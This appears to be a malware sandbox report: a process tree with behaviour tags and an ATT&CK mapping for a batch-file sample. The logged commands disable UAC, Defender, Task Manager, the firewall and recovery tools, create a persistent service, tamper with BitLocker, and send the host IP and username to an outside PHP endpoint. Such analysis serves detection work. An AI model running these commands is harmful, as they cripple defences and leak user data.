C:\Windows\system32\reg.exe
REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
2⤵
PID:4460

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:4280

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
PID:2964

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
PID:5080

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
PID:2412

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
PID:4300

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
PID:2120

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
PID:2204

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:2556

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1544

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
PID:3852

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:2376

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
PID:548

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4988

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4400

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:1348

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4416

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:3892

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
PID:4928

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
PID:4420

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:2652

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:4348

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:2876

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:2832

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:1240

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Disables RegEdit via registry modification
PID:3204

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:2908

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:4616

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:1300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.88
2⤵
PID:2932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:2604

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=adminjk123
2⤵
PID:1284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=oailvcny\admin
2⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "Admin"
2⤵
PID:3088

C:\Windows\system32\net.exe
net user "Admin"
3⤵
PID:4400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "Admin"
4⤵
PID:1156

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2556

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2088

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:4252

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:1964

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:2584

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1864

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\archive.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:1352

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:4512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:3352

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\system32\icacls.exe
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2184

C:\Windows\system32\shutdown.exe
shutdown /r /t 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5756 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:1
1⤵
PID:2164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=4984 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:1
1⤵
PID:3816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4604 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:3272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4848 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:1
1⤵
PID:2460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5312 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:1348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=4472 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:3892

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x410 0x2f8
1⤵
PID:3604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6100 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
1⤵
PID:2116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb0
2⤵
PID:112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2664 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:2
2⤵
PID:2100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3028 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:3
2⤵
PID:4900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3044 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:8
2⤵
PID:1992

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:8
2⤵
PID:2644

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:8
2⤵
PID:3896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4788 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:1
2⤵
PID:1412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4972 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:1
2⤵
PID:1428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5280 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:8
2⤵
PID:1436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5332 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:8
2⤵
PID:3512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5464 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:1
2⤵
PID:1588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
2⤵
- Enumerates system info in registry
- Modifies registry class
PID:3304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b4,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb0
3⤵
PID:2932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2216 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:2
3⤵
PID:1604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2276 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:3
3⤵
PID:2928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2476 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:8
3⤵
PID:700

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:8
3⤵
PID:1884

C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:8
3⤵
PID:2100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\archive.bat
1⤵
- Modifies data under HKEY_USERS
PID:2124

C:\Windows\system32\net.exe
net session
2⤵
PID:4748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:2296

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1156

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3088

C:\Windows\system32\powercfg.exe
powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\system32\powercfg.exe
powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:496

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
2⤵
- Modifies Windows Firewall
PID:700

C:\Windows\system32\reg.exe
REG IMPORT "C:\Windows\TEMP\disable_winload.reg"
2⤵
PID:1116

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
2⤵
PID:4896

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached" /f
2⤵
- Modifies data under HKEY_USERS
PID:3292

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2088

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /f
2⤵
- Modifies data under HKEY_USERS
PID:1848

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
2⤵
- Modifies data under HKEY_USERS
PID:5040

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
2⤵
- Modifies data under HKEY_USERS
PID:2036

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
2⤵
- Modifies data under HKEY_USERS
PID:4400

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
2⤵
- Modifies data under HKEY_USERS
PID:1156

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
2⤵
- UAC bypass
PID:2248

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1336

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:4004

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
2⤵
PID:2340

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
2⤵
- Modifies data under HKEY_USERS
PID:1440

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:1116

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:4896

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:4460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1848

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
2⤵
PID:1964

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5040

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:2028

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:1156

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
2⤵
PID:4896

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
2⤵
PID:1336

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:1964

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:2932

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
- Modifies data under HKEY_USERS
PID:828

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4400

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:4296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:2412

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:3600

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:4240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:3984

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "OAILVCNY$"
2⤵
PID:4788

C:\Windows\system32\net.exe
net user "OAILVCNY$"
3⤵
PID:4240

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3132

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:3984

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:5080

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:1156

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4240

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:1440

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\archive.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:2060

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3132

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:4124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:3504

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1436

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4004

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3088

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:832

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38c0855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4460

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Command and Scripting Interpreter

T1059

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

